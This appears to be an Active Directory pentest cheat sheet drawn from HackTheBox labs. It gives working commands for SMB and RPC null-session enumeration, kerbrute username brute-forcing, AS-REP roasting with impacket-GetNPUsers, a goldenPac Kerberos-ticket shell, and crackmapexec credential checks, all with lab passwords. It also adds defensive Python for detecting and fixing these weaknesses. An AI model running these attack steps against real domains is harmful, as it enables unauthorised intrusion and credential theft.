Active Directory
Active Directory Tools and Stuff
smbclient
The smbclient utility is the Swiss Army knife of Linux-to-NT tools. This command lets you send messages to workstations, display browse lists and connect to SMB shares. smbmap complements it by listing shares together with the permissions the supplied account has on each.
smbmap -H 10.129.148.199                                # list shares and permissions (null session)
smbclient -N -L //10.129.148.199                        # list shares with no password
smbmap -H 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!'     # list shares with credentials
rpcclient
rpcclient is a tool for executing client-side MS-RPC functions.
Anonymous login
rpcclient -U '' -N 10.129.148.19 # -N for no password -U for username
Login with credentials
$ rpcclient -U htb.local/james 10.129.148.199
Enter HTB.LOCAL\james's password:
rpcclient $> enumdom
enumdomains enumdomgroups enumdomusers
rpcclient $> enumdom
enumdomains enumdomgroups enumdomusers
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[james] rid:[0x44f]
rpcclient $>
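The `enumdomusers` output above has a fixed `user:[name] rid:[0xNNN]` shape. When you review what an anonymous or low-privilege RPC session exposes, it helps to parse that output and separate the well-known built-in accounts from domain-created ones (RIDs from 1000 upward). The parser below is an added example, not part of the original notes; the sample text is constructed to mirror the session above and the well-known RID table is an assumption based on the standard values.

```python
import re

# Constructed sample of rpcclient "enumdomusers" output (mirrors the session above)
SAMPLE_OUTPUT = """\
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[james] rid:[0x44f]
"""

# Well-known RIDs present in every domain (assumption: standard documented values)
WELL_KNOWN_RIDS = {
    500: "built-in Administrator",
    501: "built-in Guest",
    502: "KRBTGT service account",
}

# One output line: user:[<name>] rid:[0x<hex>]
LINE_RE = re.compile(r"^user:\[(?P<name>[^\]]*)\]\s+rid:\[(?P<rid>0x[0-9a-fA-F]+)\]$")


def parse_enumdomusers(text):
    """Return a list of (username, rid) tuples with the RID as an int.

    Lines that do not match the expected shape (prompts, blank lines) are skipped.
    """
    users = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            users.append((m.group("name"), int(m.group("rid"), 16)))
    return users


def classify(users):
    """Map each account name to a label: well-known built-in, domain-created, or other reserved."""
    result = {}
    for name, rid in users:
        if rid in WELL_KNOWN_RIDS:
            result[name] = WELL_KNOWN_RIDS[rid]
        elif rid >= 1000:
            # RIDs below 1000 are reserved; domain-created principals start at 1000
            result[name] = "domain-created account"
        else:
            result[name] = "other reserved RID"
    return result


if __name__ == "__main__":
    for name, label in classify(parse_enumdomusers(SAMPLE_OUTPUT)).items():
        print(f"{name:15} {label}")
```

Feeding the real `rpcclient` output into `parse_enumdomusers` gives you a quick inventory of which principals a null or low-privilege session can enumerate, which is the thing to fix (restrict anonymous RPC/SAMR access) rather than the tool.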
Kerbrute
A tool to quickly brute-force and enumerate valid Active Directory accounts through Kerberos pre-authentication.
./kerbrute userenum --domain htb.local /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.10.52
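Because user enumeration through pre-authentication asks the KDC for a TGT for every candidate name, the domain controller logs one 4768 event per attempt, and names that do not exist come back with result code 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN). A burst of such failures from a single client IP is the signal to alert on. The detection below is an added example, not from the original notes or from the kerbrute project; the event records are constructed in a simplified CSV form rather than the real Windows event XML, and the threshold and window are assumptions to tune for your environment.

```python
import csv
from collections import defaultdict
from datetime import datetime, timedelta
from io import StringIO

# Constructed sample of 4768 (TGT request) events in a simplified CSV form.
# 0x0 = success, 0x6 = KDC_ERR_C_PRINCIPAL_UNKNOWN, 0x18 = KDC_ERR_PREAUTH_FAILED
SAMPLE_EVENTS = """timestamp,event_id,target_user,client_ip,result_code
2024-01-01T10:00:00,4768,alice,10.0.0.5,0x0
2024-01-01T10:00:01,4768,guest01,10.0.0.99,0x6
2024-01-01T10:00:01,4768,guest02,10.0.0.99,0x6
2024-01-01T10:00:02,4768,guest03,10.0.0.99,0x6
2024-01-01T10:00:02,4768,guest04,10.0.0.99,0x6
2024-01-01T10:00:03,4768,guest05,10.0.0.99,0x6
2024-01-01T10:00:30,4768,bob,10.0.0.7,0x6
2024-01-01T10:05:00,4768,carol,10.0.0.5,0x18
"""

KDC_ERR_C_PRINCIPAL_UNKNOWN = "0x6"


def parse_events(text):
    """Parse the CSV sample into dicts, converting the timestamp to a datetime."""
    rows = []
    for row in csv.DictReader(StringIO(text)):
        row["ts"] = datetime.fromisoformat(row["timestamp"])
        rows.append(row)
    return rows


def find_enum_bursts(events, threshold=5, window_seconds=60):
    """Return {client_ip: peak_count} for IPs with >= threshold unknown-principal
    failures inside any sliding window of window_seconds.

    Both threshold and window are assumptions; tune them against baseline traffic.
    """
    failures = defaultdict(list)
    for e in events:
        if e["event_id"] == "4768" and e["result_code"].lower() == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            failures[e["client_ip"]].append(e["ts"])

    flagged = {}
    window = timedelta(seconds=window_seconds)
    for ip, times in failures.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            # slide the window start forward until it fits inside window_seconds
            while times[end] - times[start] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                flagged[ip] = max(flagged.get(ip, 0), count)
    return flagged


if __name__ == "__main__":
    for ip, count in find_enum_bursts(parse_events(SAMPLE_EVENTS)).items():
        print(f"possible Kerberos user enumeration from {ip}: {count} unknown principals")
```

A single typo from a real user also yields 0x6, which is why the rule keys on volume per source over a short window rather than on any one event; pairing it with the list of attempted names (many of which will never have existed in the domain) makes triage fast.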
Impacket-Tools
sudo apt install python3-impacket
To connect to MSSQL
impacket-mssqlclient 'admin:m$$ql_S@_P@ssW0rd!@10.129.148.199'
Dump a list of AS-REP-roastable users (accounts that do not require Kerberos pre-authentication) using valid credentials with GetNPUsers
impacket-GetNPUsers 'htb.local/james:J@m3s_P@ssW0rd!' -dc-ip 10.129.148.199
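What GetNPUsers is really listing is every account whose `userAccountControl` attribute carries the DONT_REQ_PREAUTH bit (0x400000), so the defender-side check is to decode that attribute yourself and clear the bit on anything that does not genuinely need it. The decoder below is an added example, not part of these notes or of Impacket; the account values are constructed and the flag table is an assumption limited to the bits the example needs.

```python
# Subset of userAccountControl bits (assumption: standard documented values)
UAC_FLAGS = {
    0x000002: "ACCOUNTDISABLE",
    0x000200: "NORMAL_ACCOUNT",
    0x010000: "DONT_EXPIRE_PASSWORD",
    0x400000: "DONT_REQ_PREAUTH",
}
DONT_REQ_PREAUTH = 0x400000
ACCOUNTDISABLE = 0x000002

# Constructed sample: sAMAccountName -> userAccountControl as read from the directory
SAMPLE_ACCOUNTS = {
    "james":      0x200 | 0x400000,          # enabled, pre-auth not required
    "svc_backup": 0x200 | 0x10000,           # enabled, password never expires
    "olduser":    0x200 | 0x2 | 0x400000,    # disabled, pre-auth not required
}


def decode_uac(value):
    """Return the names of the known flags set in a userAccountControl value."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def asrep_roastable(accounts):
    """Enabled accounts that do not require pre-authentication, sorted by name.

    Disabled accounts are excluded because the KDC will not issue them a TGT anyway.
    """
    return sorted(
        name for name, uac in accounts.items()
        if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE
    )


def require_preauth(value):
    """Return the userAccountControl value with DONT_REQ_PREAUTH cleared (the fix)."""
    return value & ~DONT_REQ_PREAUTH


if __name__ == "__main__":
    for name in asrep_roastable(SAMPLE_ACCOUNTS):
        before = SAMPLE_ACCOUNTS[name]
        print(f"{name}: {decode_uac(before)} -> {decode_uac(require_preauth(before))}")
```

Run against an LDAP export of `userAccountControl` values, `asrep_roastable` gives the same set GetNPUsers would find, and `require_preauth` shows the value to write back; the disabled account is reported as not roastable but is still worth cleaning up before it is ever re-enabled.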
Getting a shell with generated Kerberos tickets (see HTB Mantis)
impacket-goldenPac 'htb.local/james:J@m3s_P@ssW0rd!@mantis'
Crackmapexec
https://github.com/byt3bl33d3r/CrackMapExec
Documentation: https://mpgn.gitbook.io/crackmapexec/
CrackMapExec is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.
Checking whether a set of credentials is valid over SMB
crackmapexec smb 10.129.148.199 -u 'James' -p 'J@m3s_P@ssW0rd!'